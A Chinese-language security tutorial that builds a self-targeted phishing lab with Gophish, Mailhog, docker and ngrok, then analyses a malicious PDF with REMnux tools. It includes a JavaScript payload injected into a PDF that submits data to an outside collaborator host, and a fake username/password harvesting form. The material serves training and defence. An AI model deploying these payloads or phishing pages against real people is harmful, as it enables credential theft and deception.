今天给大家分享一个自己钓自己的网络钓鱼攻击案例,我将从创建到实施做一个完整的讲解,其中会使用 docker,更方便的搭建环境,主要用到的工具包括:Gophish(一个钓鱼框架)、Mailhog(邮件发送服务)。
https://github.com/cornerpirate/JS2PDFInjector
app.alert("alter alert");
this.submitForm('http://azdn342b12dbmo0uvmj5yrekrbx1lq.burpcollaborator.net');
java -jar JS2PDFInjector-1.0.jar $(pwd)/sample.pdf app.js
services:
gophish:
image: "gophish/gophish"
ports:
- "3333:3333"
mailhog:
image: "mailhog/mailhog"
ports:
- "1025:1025"
- "8025:8025"
depends_on:
- gophish
admin/gophish
。由于 docker 每次启动时密码都不同,所以无法使用默认密码登录,可以在控制台看到密码:docker run -it --rm -p 3333:3333 gophish/gophish
0.0.0.0:1025
:docker network ls
docker network inspect fcff01c8be6a
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Right Now Nothing</title>
</head>
<body>
<form method="post" >
name:<input name="username" ><br>
pass:<input name="password" ><br>
<input type="submit" value="submit">
</form>
</body>
</html>
ngrok http 9002
{{.URL}}
会自动替换为 gophish 的服务器 IP,{{.FirstName}}
会自动替换为目标邮箱的名字。{{.URL}}
,所以需要配置 gopher 的监听 URL:https://toolbox.googleapps.com/apps/messageheader/analyzeheader
https://mha.azurewebsites.net/
https://gchq.github.io/CyberChef/#recipe=Extract_URLs%28false%29Defang_URL%28true,true,true,%27Valid%20domains%20and%20full%20URLs%27%29&input=aHR0cDovL2dvb2dsZS5jb20
https://www.url2png.com/
https://www.ipvoid.com/ip-blacklist-check/
https://www.virustotal.com/gui/home/upload
https://www.virustotal.com/gui/home/upload
https://talosintelligence.com/talos_file_reputation
docker pull remnux/remnux-distro
docker run --rm -itd remnux/remnux-distro /bin/bash
docker cp downloadme.pdf '<contid>:/tmp'
docker exec -it d3511ccab833 /bin/bash
https://en.wikipedia.org/wiki/List_of_file_signatures
pdfid lastone.pdf
/Page - pdf 的页数
/Encrypt - 规定需要读取的密码
/ObjStm - 对象流
/Js - pdf 文件可能包含恶意打开的 js 代码
/AA 和 /OpenAction - 当我们打开 pdf 文件时将自动执行的操作。可以自动启动恶意 js 命令
/AcroForm - 使用 Adobe Acrobat Pro/Standard 制作的 pdf 表单
/JBIG2Decode - 表示 pdf 使用 JBIG2Decode 压缩
/RichMedia - 用于在 pdf 上嵌入文件、视频等
/Launch - 启动一些动作
/EmbeddedFile - 包含一些外部文件
/XFA - XML 表单架构
/URI - 要访问的 URL
peepdf lastone.pdf
extract js > extracted.txt
peepdf -s extract.txt malicouspdf.pdf
征集原创技术文章中,欢迎投递
投稿邮箱:[email protected]
文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关
通过审核并发布能收获200-800元不等的稿酬。